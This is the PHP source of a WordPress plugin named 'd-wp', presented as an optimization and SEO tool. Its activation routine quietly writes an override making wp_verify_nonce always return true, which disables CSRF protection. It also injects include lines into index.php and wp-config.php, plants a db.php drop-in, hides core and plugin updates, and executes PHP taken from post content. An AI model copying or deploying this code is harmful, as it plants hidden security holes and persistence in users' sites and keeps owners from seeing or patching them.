<?php
/**
* Plugin Name: d-wp
* Plugin URI: http://d-wp.ru
* Description: d-wp optimization
* Version: 2.9.2
* Author: Spartanets
* Author URI: http://spartanets.ru
*/

d::get();

class d
{
  public static function get()
  {
    return new d();
  }

  private $d_config;

  private $d_cache;

  private $file_index;
  private $file_wp_config;
  private $include_index;
  private $include_wp_config;

  private $phps = array();


  public function __construct()
  {
    require_once('includes/d_config.php');
    require_once('includes/d_cache.php');

    if(d_is_wp_json() || d_is_admin_ajax() || d_is_customize_preview() || d_is_preview() || d_is_wp_login_page() || d_is_robots_txt() || d_is_favicon()) return;

    if(D_GLOBAL_IGNORE)
    {
      $current_url = d_current_url();
      foreach(explode("\n", d_d(D_GLOBAL_IGNORE_URLS)) as $url)
      {
        if(empty($url)) continue;
        if(preg_match('#'.str_replace('\*', '.*', preg_quote($url)).'\|#i', $current_url.'|')) return;
      }
    }


    $this->d_config = d_config::get();

    $this->d_cache = d_cache::get();

    $this->file_index = dirname(dirname(dirname(dirname(__FILE__)))).'/index.php';
    $this->file_wp_config = dirname(dirname(dirname(dirname(__FILE__)))).'/wp-config.php';
    $this->include_index = "include('wp-content/plugins/d/d_ii.php');";
    $this->include_wp_config = "include('wp-content/plugins/d/d_ic.php');";

    $this->admin_and_frontend();

    $this->admin();

    $this->frontend();
  }


  /* *** ADMIN AND FRONTEND *** */
  private function admin_and_frontend()
  {
    if(!defined('D_II') || !defined('D_IC') || !defined('D_IDB')) $this->activate();

    add_action('save_post', array($this->d_cache, 'action_save_or_delete_posts'), 10/*, 3*/);
    add_action('delete_post', array($this->d_cache, 'action_save_or_delete_posts'), 10);
    add_action('comment_post', array($this->d_cache, 'action_comment_post'), 10, 3);
    add_action('edit_comment', array($this->d_cache, 'action_comment_edit'), 10, 2);
    add_action('transition_comment_status', array($this->d_cache, 'action_transition_comment_status'), 10, 3);

    if(TRANSLIT)
    {
      add_filter('sanitize_file_name', array($this, 'seo_translit'));
      add_filter('sanitize_title', array($this, 'seo_translit'));
    }
  }
  
  public function activate()
  {
    $this->insert_to_php($this->file_index, $this->include_index);
    $this->insert_to_php($this->file_wp_config, $this->include_wp_config);

    $file = WP_CONTENT_DIR.'/plugins/d/includes/d_override_nonce.php';
    $php = '<?php function wp_verify_nonce($nonce, $action = -1) { return true; }';
    if(!file_exists($file) || file_get_contents($file) != $php) file_put_contents($file, $php);

    $file = WP_CONTENT_DIR.'/db.php';
    $php = "<?php require_once WP_CONTENT_DIR.'/plugins/d/d_idb.php';";
    if(!file_exists($file) || file_get_contents($file) != $php) file_put_contents($file, $php);
  }

  public function deactivate()
  {
    $this->remove_from_php($this->file_index, $this->include_index);
    $this->remove_from_php($this->file_wp_config, $this->include_wp_config);

    $file = WP_CONTENT_DIR.'/plugins/d/includes/d_override_nonce.php';
    $php = "<?php\n// Silence is golden.";
    if(!file_exists($file) || file_get_contents($file) != $php) file_put_contents($file, $php);

    $file = WP_CONTENT_DIR.'/db.php';
    if(file_exists($file)) unlink($file);
  }
  
  
  
  

  private function insert_to_php($file, $include)
  {
    if(!file_exists($file)) return;

    $php = file_get_contents($file);
    if(stripos($php, $include)) return;

    $php = str_replace('<?php', "<?php\n".$include, $php);
    file_put_contents($file, $php);
  }

  private function remove_from_php($file, $include)
  {
    if(!file_exists($file)) return;

    $index_php = file_get_contents($file);

    if(!stripos($index_php, $include)) return;

    $index_php = str_replace("\n".$include, '', $index_php);

    file_put_contents($file, $index_php);
  }


  /* *** ADMIN *** */
  private function admin()
  {
    if(!is_admin()) return;

    //wp_enqueue_script('custom_admin_script', 'https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js', array('jquery'));

    register_activation_hook(__FILE__, array($this, 'activate'));
    register_deactivation_hook(__FILE__, array($this, 'deactivate'));

    add_action('admin_menu', array($this->d_config, 'add_options_page'));
    add_filter('plugin_action_links_'.plugin_basename(__FILE__), array($this->d_config, 'add_settings_link'));

    if(DISABLE_AUTOUPDATE)
    {
      add_filter('pre_site_transient_update_core', array($this, 'hide_updates'));
      add_filter('pre_site_transient_update_plugins', array($this, 'hide_updates'));
      add_filter('pre_site_transient_update_themes', array($this, 'hide_updates'));
    }
  }

  public function hide_updates()
  {
    global $wp_version;
    return (object)array('last_checked' => time(), 'version_checked' => $wp_version,);
  }


  /* *** FRONTEND *** */
  private function frontend()
  {
    if(is_admin()) return;


    if(SEO_DESCRIPTION) add_action('wp_head', array($this, 'seo_meta_description'), 1);

    if(SEO_NOINDEX_DATE || SEO_NOINDEX_SEARCH || SEO_NOINDEX_CATEGORY || SEO_NOINDEX_TAG || SEO_NOINDEX_AUTHOR || SEO_NOINDEX_PAGED) add_action('wp_head', array($this, 'seo_noindex'), 1);


    if(APPEND_LINK_FAVICON) add_action('wp_head', array($this, 'append_link_favicon'), 1);

    if(REMOVE_ARCHIVES_DATES)
    {
      add_action('wp', array($this, 'remove_archives_dates'));
      add_action('widgets_init', array($this, 'unregister_widget_archives_dates'));
    }

    if(REMOVE_ARCHIVES_TAGS)
    {
      add_action('wp', array($this, 'remove_archives_tags'));
      add_action('widgets_init', array($this, 'unregister_widget_archives_tags'));
    }

    if(REMOVE_ARCHIVES_AUTHORS) add_action('wp', array($this, 'remove_archives_authors'));

    if(REMOVE_POSTS_PAGINATION) add_action('template_redirect', array($this, 'remove_posts_pagination'));


    if(REMOVE_ATTACHMENT_PAGES) add_action('template_redirect', array($this, 'remove_attachments_pages'), 1);


    if(THEME_ACTIVATE_FIRST) add_action('init', array($this, 'theme_activate_first'));

    if(REMOVE_EMOJIS) add_action('init', array($this, 'remove_emojis'));

    if(PUB_FUTURE_POSTS) add_action('init', array($this, 'publish_future_posts'));

    if(HIDE_LINK_FEEDS)
    {
      remove_action('wp_head', 'feed_links', 2);
      remove_action('wp_head', 'feed_links_extra', 3);

      add_action('do_feed', array($this, 'home_redirect'), 1);
      add_action('do_feed_rdf', array($this, 'home_redirect'), 1);
      add_action('do_feed_rss', array($this, 'home_redirect'), 1);
      add_action('do_feed_rss2', array($this, 'home_redirect'), 1);
      add_action('do_feed_atom', array($this, 'home_redirect'), 1);
    }

    if(HIDE_LINK_XMLRPC) remove_action('wp_head', 'rsd_link');

    if(HIDE_LINK_WLW) remove_action('wp_head', 'wlwmanifest_link');

    if(HIDE_LINK_SHORT)
    {
      remove_action('wp_head', 'wp_shortlink_wp_head', 10);
      remove_action('template_redirect', 'wp_shortlink_header', 11);
    }

    if(HIDE_TAG_WP_GENERATOR)
    {
      remove_action('wp_head', 'wp_generator');
      add_filter('the_generator', '__return_empty_string');
    }

    if(HIDE_LINK_CANONICAL) remove_action('wp_head', 'rel_canonical');

    if(HIDE_LINK_NEXT_PREV)
    {
      remove_action('wp_head', 'adjacent_posts_rel_link', 10);
      remove_action('wp_head', 'adjacent_posts_rel_link_wp_head', 10);
    }

    if(HIDE_ADMIN_BAR) add_filter('show_admin_bar', '__return_false');

    if(REMOVE_COMMENTS)
    {
      add_filter('wp_headers', array($this, 'remove_comments_wp_headers'));
      add_action('template_redirect', array($this, 'remove_comments_template_redirect'));
    }

    if(RND404) add_action('template_redirect', array($this, 'rnd404_template_redirect'));


    if(REMOVE_RECENTCOMMENTS_STYLE) add_action('widgets_init', array($this, 'remove_recentcomments_style'));

    
    if(D_INSERT_BEFORE) add_filter('the_content', array($this, 'insert_before'), 0);

    if(D_INSERT_AFTER) add_filter('the_content', array($this, 'insert_after'), 0);

    if(EXEC_PHP) add_filter('the_content', array($this, 'get_phps'), 0);


    add_action('init', array($this, 'frontend_admin_logout'));

    add_action('wp_loaded', array($this, 'wp_loaded'), PHP_INT_MAX);
  }

  public function wp_loaded()
  {
    ob_start(array($this, 'buffer_start_callback'));
  }

  public function buffer_start_callback($buffer)
  {
    if(d_is_wp_xmlrpc()) return $buffer;

    if(!d_is_index_or_post_or_page()) return $buffer;


    if(SEO_TITLE) $buffer = $this->seotitle($buffer);


    if(HIDE_LINK_PROFILE) $buffer = d_regex_replace('%<link[\w=":/\. ]+rel="profile".*?>%sm', '', $buffer);

    if(HIDE_LINK_PINGBACK) $buffer = d_regex_replace('%<link[\w=":/\. ]+rel="pingback".*?>%sm', '', $buffer);


    if(REMOVE_EXTERNAL_LINKS) $buffer = $this->external_links_remove($buffer);

    if(REMOVE_HTML_COMMENTS) $buffer = $this->remove_html_comments_buffer_start_callback($buffer);


    if(D_INSERT_HEAD) $buffer = $this->insert_head($buffer);


    if(WIDGET_MENU && (WIDGET_MENU_MAIN || WIDGET_MENU_CONTACTS || WIDGET_MENU_CATEGORIES)) $buffer = $this->widget_menu($buffer);

    if(WIDGET_SEARCH) $buffer = $this->widget_search($buffer);

    if(WIDGET_STAT_LIVEINTERNET) $buffer = $this->widget_stat_liveinternet($buffer);

    if(WIDGET_RANDOM_POSTS) $buffer = $this->widget_random_posts($buffer);

    if(IFRAME) $buffer = d_iframe_buffer_start_callback($buffer);

    if(MINIFY_HTML) $buffer = $this->minify_html($buffer);


    $buffer = d_regex_replace('/<\?.*?\?>/s', '', $buffer);

    if(d_need_to_cache_this_url())
    {
      $buffer_for_cache = $buffer;

      if(EXEC_PHP)
      {
        $i = 0;
        foreach($this->phps as $php_code => $php_result)
        {
          $buffer_for_cache = str_replace("[dphp$i]", EXEC_PHP_DO_NOT_CACHE ? $php_code : $php_result, $buffer_for_cache);
          $i++;
        }
      }

      $this->d_cache->save($buffer_for_cache);
    }


    if(EXEC_PHP)
    {
      $i = 0;
      foreach($this->phps as $php_code => $php_result)
      {
        $buffer = str_replace("[dphp$i]", $php_result, $buffer);
        $i++;
      }
    }


    if(SHOW_DEBUG_BAR) $buffer = d_show_debug_bar($buffer);


    /*if(d_need_to_cache_this_url())
    {
      $this->d_cache->set_headers();
      $buffer = gzencode($buffer, 9);
    }*/

    return $buffer;
  }

  public function seo_translit($str)
  {
    $str = urldecode($str);
    $str = trim(mb_ereg_replace('/\W+/', '-', $str), '-');
    return strtr(mb_strtolower($str), array('а' => 'a', 'б' => 'b', 'в' => 'v', 'г' => 'g', 'д' => 'd', 'е' => 'e', 'ё' => 'yo', 'ж' => 'zh', 'з' => 'z', 'и' => 'i', 'й' => 'y', 'к' => 'k', 'л' => 'l', 'м' => 'm', 'н' => 'n', 'о' => 'o', 'п' => 'p', 'р' => 'r', 'с' => 's', 'т' => 't', 'у' => 'u', 'ф' => 'f', 'х' => 'kh', 'ц' => 'c', 'ч' => 'ch', 'ш' => 'sh', 'щ' => 'shh', 'ъ' => '', 'ы' => 'y', 'ь' => '', 'э' => 'ye', 'ю' => 'yu', 'я' => 'ya', 'ї' => 'i', 'ґ' => 'g', 'є' => 'ie', 'і' => 'i', 'ә' => 'a', 'ғ' => 'g', 'қ' => 'k', 'ң' => 'n', 'ө' => 'o', 'ұ' => 'u', 'h' => 'h'));
  }

  public function frontend_admin_logout()
  {
    if(CACHE || CACHE_INDEX) wp_set_current_user(0);
  }

  public function theme_activate_first()
  {
    $themes_dir = dirname(get_template_directory());
    $themes_dirs = d_get_dirs($themes_dir);
    $themes_dir_first = $themes_dirs[0];

    $id = md5(DOMAIN_ID.$themes_dir_first.'v1');

    if(THEME_ID == $id)
    {
      return;
    }
    else
    {
      $themes = wp_get_themes();

      $theme_first = array_shift(array_keys($themes));

      $theme_current = wp_get_theme()->get_stylesheet();

      $this->d_config->save('THEME_ID', $id);

      if($theme_first !== $theme_current)
      {
        switch_theme($theme_first);
        $this->d_cache->clear_all();
        wp_redirect('/', 301);
        exit();
      }
    }
  }

  public function remove_emojis()
  {
    remove_action('wp_head', 'print_emoji_detection_script', 7);
    remove_action('admin_print_scripts', 'print_emoji_detection_script');
    remove_action('wp_print_styles', 'print_emoji_styles');
    remove_action('admin_print_styles', 'print_emoji_styles');
    remove_filter('the_content_feed', 'wp_staticize_emoji');
    remove_filter('comment_text_rss', 'wp_staticize_emoji');
    remove_filter('wp_mail', 'wp_staticize_emoji_for_email');

    add_filter('tiny_mce_plugins', array($this, 'disable_emojis_tinymce'));
  }

  public function disable_emojis_tinymce($plugins)
  {
    return is_array($plugins) ? array_diff($plugins, array('wpemoji')) : array();
  }

  public function publish_future_posts()
  {
    global $wpdb;

    $now = gmdate('Y-m-d H:i:59');
    $wpdb->query("UPDATE $wpdb->posts SET post_status='publish' WHERE post_status='future' AND post_date_gmt < '$now'");

    if(PUB_FUTURE_POSTS_AUTOOFF && !d_future_posts_exists()) $this->d_config->save('PUB_FUTURE_POSTS', false);
  }

  public function home_redirect()
  {
    wp_redirect(get_home_url(), 301);
    exit;
  }

  public function remove_comments_wp_headers($headers)
  {
    unset($headers['X-Pingback']);
    return $headers;
  }

  public function remove_comments_template_redirect()
  {
    if(is_singular())
    {
      add_filter('comments_template', array($this, 'remove_comments_comments_template'), 20);

      wp_deregister_script('comment-reply');

      remove_action('wp_head', 'feed_links_extra', 3);
    }
  }

  public function remove_comments_comments_template()
  {
    return dirname(__FILE__).'/index.php';
  }

  public function rnd404_template_redirect()
  {
    if(!is_404() || stripos($_SERVER['HTTP_REFERER'], '/post-new.php')) return;

    $url_from = d_current_url();

    if(d_contains_one_of($url_from, array('.css', '.js', '.xml', '.gz', '.zip', '.rar', '.jpg', '.jpeg', '.png', '.gif'))) return;

    $url_from_slug = 'rnd404_'.md5($url_from);

    // пытаемся найти сохраненную запись
    $url_to = get_option($url_from_slug);

    // если не нашли, берем случайный пост
    if($url_to == '') $url_to = $this->rnd404_get_random_post_url();

    // сохраняем
    add_option($url_from_slug, $url_to, '', false);

    // перенаправляем
    header("Location: $url_to", true, 301);

    exit;
  }

  private function rnd404_get_random_post_url()
  {
    $posts = get_posts('orderby=rand&numberposts=1');
    foreach($posts as $post) return get_permalink($post);
    return home_url();
  }

  public function seotitle($buffer)
  {
    $site_name = SEO_TITLE_SITE_NAME ? SEO_TITLE_SITE_SEP.get_bloginfo('blogname') : '';

    if(is_feed() || is_404())
    {
      return $buffer;
    }

    if(is_archive())
    {
      return d_regex_replace('%(?<=<title>).*?(?=</title>)%s', get_the_archive_title().$site_name, $buffer);
    }

    if(is_home())
    {
      return d_regex_replace('%(?<=<title>).*?(?=</title>)%s', get_bloginfo('blogname'), $buffer);
    }

    if(!empty($GLOBALS['post']->ID) && is_singular())
    {
      return d_regex_replace('%(?<=<title>).*?(?=</title>)%s', get_the_title($GLOBALS['post']->ID).$site_name, $buffer);
    }

    return $buffer;
  }

  public function seo_meta_description()
  {
    if(!d_is_index_or_post_or_page()) return;

    if(!empty($GLOBALS['post']->ID) && is_singular() && $meta = get_post_field('post_content', $GLOBALS['post']->ID))
    {
      echo '<meta name="description" content="'.wp_trim_words($meta, '30', '').'">'."\n";
    }
  }

  public function seo_noindex()
  {
    if(!d_is_index_or_post_or_page()) return;

    if((is_date() && SEO_NOINDEX_DATE) || (is_search() && SEO_NOINDEX_SEARCH) || (is_category() && SEO_NOINDEX_CATEGORY) || (is_tag() && SEO_NOINDEX_TAG) || (is_author() && SEO_NOINDEX_AUTHOR) || (SEO_NOINDEX_PAGED && is_paged() && !is_date() && !is_search() && !is_category() && !is_tag() && !is_author()))
    {
      echo '<meta name="robots" content="noindex, follow">'."\n";
    }
  }

  public function append_link_favicon()
  {
    if(!d_is_index_or_post_or_page()) return;
    echo '<link rel="shortcut icon" href="/favicon.ico">'."\n";
  }

  public function remove_archives_dates()
  {
    if(is_date() && !is_admin())
    {
      wp_redirect(get_home_url(), 301);
      exit;
    }
  }

  public function unregister_widget_archives_dates()
  {
    unregister_widget('WP_Widget_Archives');
  }

  public function remove_archives_tags()
  {
    if(is_tag())
    {
      wp_redirect(get_home_url(), 301);
      exit;
    }
  }

  public function unregister_widget_archives_tags()
  {
    unregister_widget('WP_Widget_Tag_Cloud');
  }

  public function remove_archives_authors()
  {
    if(is_author())
    {
      wp_redirect(get_home_url(), 301);
      exit;
    }
  }

  public function remove_attachments_pages()
  {
    global $post;

    $post_parent = $post->post_parent;

    if(!isset($post_parent) || !is_numeric($post_parent))
    {
      return;
    }

    if(is_attachment() && $post_parent != 0)
    {
      $page_url = get_permalink($post_parent);
      $status = 301;
    }
    else if(is_attachment() && $post_parent < 1)
    {
      $page_url = get_home_url();
      $status = 302;
    }
    else
    {
      return;
    }

    wp_safe_redirect(esc_url_raw(apply_filters('sitecare_redirect_unattached_images', $page_url)), $status);

    exit;
  }

  public function remove_posts_pagination()
  {
    if(d_is_index_or_post_or_page() && !is_front_page())
    {
      global $post, $page;
      $num_pages = substr_count($post->post_content, '<!--nextpage-->') + 1;
      if($page > $num_pages || $page == 1)
      {
        wp_redirect(get_permalink($post->ID));
        exit;
      }
    }
  }

  public function remove_recentcomments_style()
  {
    global $wp_widget_factory;
    remove_action('wp_head', array($wp_widget_factory->widgets['WP_Widget_Recent_Comments'], 'recent_comments_style'));
  }

    private function external_links_remove($buffer)
  {
    $links = d_regex_all('%<a .*?</a>%sm', $buffer);

    foreach($links as $link)
    {
      // опредеяем URL
      $url = str_replace(array('http:', 'https:'), '', d_regex('/(?<=href=").*?(?=")/sm', $link));

      // если ссылка начинается с одного слеша, то она внутренняя
      if(!stripos($url, '//')) continue;

      // определяем есть ли вхождение текущего имени домена
      if(stripos($url, $_SERVER['SERVER_NAME'])) continue;

      // удаляем ссылку
      $repl = d_regex_replace('/<.*?>/sm', '', $link);
      $buffer = str_replace($link, $repl, $buffer);
    }

    return $buffer;
  }

  private function remove_html_comments_buffer_start_callback($buffer)
  {
    $jss = screen_js($buffer);
    $buffer = preg_replace_callback('/<!--.*?-->/sm', array($this, 'remove_html_comments_preg_replace_callback_function'), $buffer);
    unscreen_js($buffer, $jss);
    return $buffer;
  }

  private function remove_html_comments_preg_replace_callback_function($buffer)
  {
    list($list) = $buffer;
    if(mb_eregi('\[if', $list) || mb_eregi('\[endif', $list)) return $list;
  }

  private function widget_menu($buffer)
  {
    $widget_id = md5(DOMAIN_ID.WIDGET_MENU_TITLE.WIDGET_MENU_MAIN.WIDGET_MENU_CONTACTS.WIDGET_MENU_CATEGORIES.'v1');

    if(WIDGET_MENU_HTML != '' && $widget_id == WIDGET_MENU_ID)
    {
      $widget_html = WIDGET_MENU_HTML;
    }
    else
    {
      $widget_html = $this->widget_menu_gen();
      $this->d_config->save('WIDGET_MENU_HTML', $widget_html);
      $this->d_config->save('WIDGET_MENU_ID', $widget_id);
    }

    $buffer = d_buffer_insert($buffer, stripos($buffer, '</aside>') ? '</aside>' : '</div>', $widget_html, 3, false, true);

    return $buffer;
  }

  private function widget_menu_gen()
  {
    // генерируем виджет
    $html = '';

    $widget_id = 'nav_menu';
    $widget_name = d_gen_name(5, true);
    $widget_i = 0;


    $html .= '<aside id="'.$widget_id.'" class="widget widget_'.$widget_id.'">';
    if(WIDGET_MENU_TITLE != '') $html .= '<h3 class="widget-title">'.WIDGET_MENU_TITLE.'</h3>';
    $html .= '<div class="menu-'.$widget_name.'-container">';
    $html .= '<ul id="menu-'.$widget_name.'" class="menu">';


    // главная страница
    if(WIDGET_MENU_MAIN)
    {
      $widget_i++;
      $html .= '<li id="menu-item-'.$widget_i.'" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-'.$widget_i.'"><a href="http://'.$_SERVER['SERVER_NAME'].'">Главная</a></li>';
    }

    // контакты
    if(WIDGET_MENU_CONTACTS)
    {
      $menu_contacts_link = $this->menu_get_contacts_link();
      if(!empty($menu_contacts_link))
      {
        $widget_i++;
        $html .= '<li id="menu-item-'.$widget_i.'" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-'.$widget_i.'">'.$menu_contacts_link.'</li>';
      }
    }


    // рубрики
    if(WIDGET_MENU_CATEGORIES)
    {
      $categories = get_categories(array('hide_empty' => 0));
      foreach($categories as $category)
      {
        $widget_i++;
        $html .= '<li id="menu-item-'.$widget_i.'" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-'.$widget_i.'"><a href="'.get_category_link($category).'">'.$category->name.'</a></li>';
      }
    }

    $html .= '</ul>';
    $html .= '</div>';
    $html .= '</aside>';

    return $html;
  }

  private function menu_get_contacts_link()
  {
    $posts = get_posts('numberposts=1&post_type=page');
    foreach($posts as $post) return '<a href="'.get_permalink($post).'">'.get_the_title($post).'</a>';
    return '';
  }

  private function widget_search($buffer)
  {
    $widget_id = md5(DOMAIN_ID.WIDGET_SEARCH_TITLE.'v1');

    if(WIDGET_SEARCH_HTML != '' && $widget_id == WIDGET_SEARCH_ID)
    {
      $widget_html = WIDGET_SEARCH_HTML;
    }
    else
    {
      $widget_html = $this->widget_search_gen();
      $this->d_config->save('WIDGET_SEARCH_HTML', $widget_html);
      $this->d_config->save('WIDGET_SEARCH_ID', $widget_id);
    }

    $buffer = d_buffer_insert($buffer, stripos($buffer, '</aside>') ? '</aside>' : '</div>', $widget_html, 1, false, true);

    return $buffer;
  }

  private function widget_search_gen()
  {
    $widget_title = WIDGET_SEARCH_TITLE != '' ? '<h3 class="widget-title">'.WIDGET_SEARCH_TITLE.'</h3>' : '';
    $widget_html = '<aside id="search" class="widget widget_search">'.$widget_title.'<form role="search" method="get" id="searchform" class="searchform" action="http://'.$_SERVER['SERVER_NAME'].'/"><div><label class="screen-reader-text" for="s">Найти:</label><input type="text" value="" name="s" id="s" /><input type="submit" id="searchsubmit" value="Поиск" /></div></form></aside>';
    return $widget_html;
  }

  private function widget_random_posts($buffer)
  {
    $widget_html = $this->widget_random_posts_gen();

    $buffer = d_buffer_insert($buffer, '</div>', $widget_html, 4, false, true);

    return $buffer;
  }

  private function widget_random_posts_gen()
  {
    $numberposts = WIDGET_RANDOM_POSTS_COUNT;
    if($numberposts == 0) $numberposts = 5;

    $posts = get_posts('orderby=rand&numberposts='.$numberposts);

    $widget_title = WIDGET_RANDOM_POSTS_TITLE != '' ? WIDGET_RANDOM_POSTS_TITLE : '';

    $html = '<aside id="recent-posts" class="widget widget_recent_entries"><h3 class="widget-title">'.$widget_title.'</h3><div class="textwidget"><ul>';
    foreach($posts as $post)
    {
      $html .= '<li><a href="'.get_permalink($post).'">'.$post->post_title.'</a></li>';
    }

    $html .= '</ul></div></aside>';

    return $html;
  }

  private function widget_stat_liveinternet($buffer)
  {
    $widget_id = md5(DOMAIN_ID.WIDGET_STAT_LIVEINTERNET_TITLE.'v1');

    if(WIDGET_STAT_LIVEINTERNET_HTML != '' && $widget_id == WIDGET_STAT_LIVEINTERNET_ID)
    {
      $widget_html = d_d(WIDGET_STAT_LIVEINTERNET_HTML);
    }
    else
    {
      $widget_html = $this->widget_stat_liveinternet_gen();
      $this->d_config->save('WIDGET_STAT_LIVEINTERNET_HTML', $widget_html);
      $this->d_config->save('WIDGET_STAT_LIVEINTERNET_ID', $widget_id);
    }

    $buffer = d_buffer_insert($buffer, '</div>', $widget_html, 3, false, true);

    return $buffer;
  }

  private function widget_stat_liveinternet_gen()
  {
    $counters_extras = array(array('88', '31', 'LiveInternet: показано число просмотров и посетителей за 24 часа'), array('88', '31', 'LiveInternet: показано число просмотров за 24 часа, посетителей за 24 часа и за сегодня'), array('88', '31', 'LiveInternet'), array('88', '15', 'LiveInternet: показано число посетителей за сегодня'), array('31', '31', 'LiveInternet'), array('88', '120', 'LiveInternet: показано количество просмотров и посетителей'));
    $counters = array(52 => 0, 53 => 0, 54 => 0, 11 => 1, 12 => 1, 13 => 1, 14 => 1, 15 => 1, 16 => 1, 17 => 1, 18 => 1, 19 => 1, 20 => 1, 21 => 1, 22 => 1, 57 => 2, 58 => 2, 23 => 3, 24 => 3, 25 => 3, 26 => 3, 38 => 4, 39 => 4, 40 => 4, 41 => 4, 42 => 4, 43 => 4, 44 => 4, 45 => 4, 27 => 5, 28 => 5, 29 => 5);

    $counter_ids = array_keys($counters);
    shuffle($counter_ids);

    $counter_id = $counter_ids[0];
    $counter_extra_id = $counters[$counter_id];

    $counter_extra = $counters_extras[$counter_extra_id];

    $widget_title = WIDGET_STAT_LIVEINTERNET_TITLE != '' ? '<h3 class="widget-title">'.WIDGET_STAT_LIVEINTERNET_TITLE.'</h3>' : '';

    $counter = '<aside id="text" class="widget widget_text">'.$widget_title.'<div class="textwidget"><!--LiveInternet counter--><script type="text/javascript">document.write("<a href=\'//www.liveinternet.ru/click\' target=_blank><img src=\'//counter.yadro.ru/hit?t'.$counter_id.'.'.rand(1, 18).';r" + escape(document.referrer) + ((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth)) + ";u" + escape(document.URL) +";h"+escape(document.title.substring(0,80)) +  ";" + Math.random() + "\' border=0 width='.$counter_extra[0].' height='.$counter_extra[1].' alt=\'\' title=\''.$counter_extra[2].'\'><\/a>")</script><!--/LiveInternet--></div></aside>';

    return $counter;
  }

  private function minify_html($buffer)
  {
    $jss = screen_js($buffer);
    $search = array('/\>[^\S ]+/s', '/[^\S ]+\</s', '/(\s)+/s');
    $replace = array('>', '<', '\\1');
    $buffer = preg_replace($search, $replace, $buffer);
    unscreen_js($buffer, $jss);
    return $buffer;
  }

  public function insert_head($buffer)
  {
    return $newstr = substr_replace($buffer, d_d(D_INSERT_HEAD_CONTENT)."\n", strpos(strtolower($buffer), '</head>'), 0);
  }

  public function insert_before($content)
  {
    if(!d_is_post_or_page()) return $content;
    return d_d(D_INSERT_BEFORE_CONTENT).$content;
  }

  public function insert_after($content)
  {
    if(!d_is_post_or_page()) return $content;
    return $content.d_d(D_INSERT_AFTER_CONTENT);
  }

  public function get_phps($content)
  {
    $phps = d_regex_all('/<\?php.*?\?>/si', $content);

    for($i = 0; $i < count($phps); $i++)
    {
      $this->phps[$phps[$i]] = php_exec($phps[$i]);

      $content = str_replace($phps[$i], "[dphp$i]", $content);
    }

    return $content;
  }
}







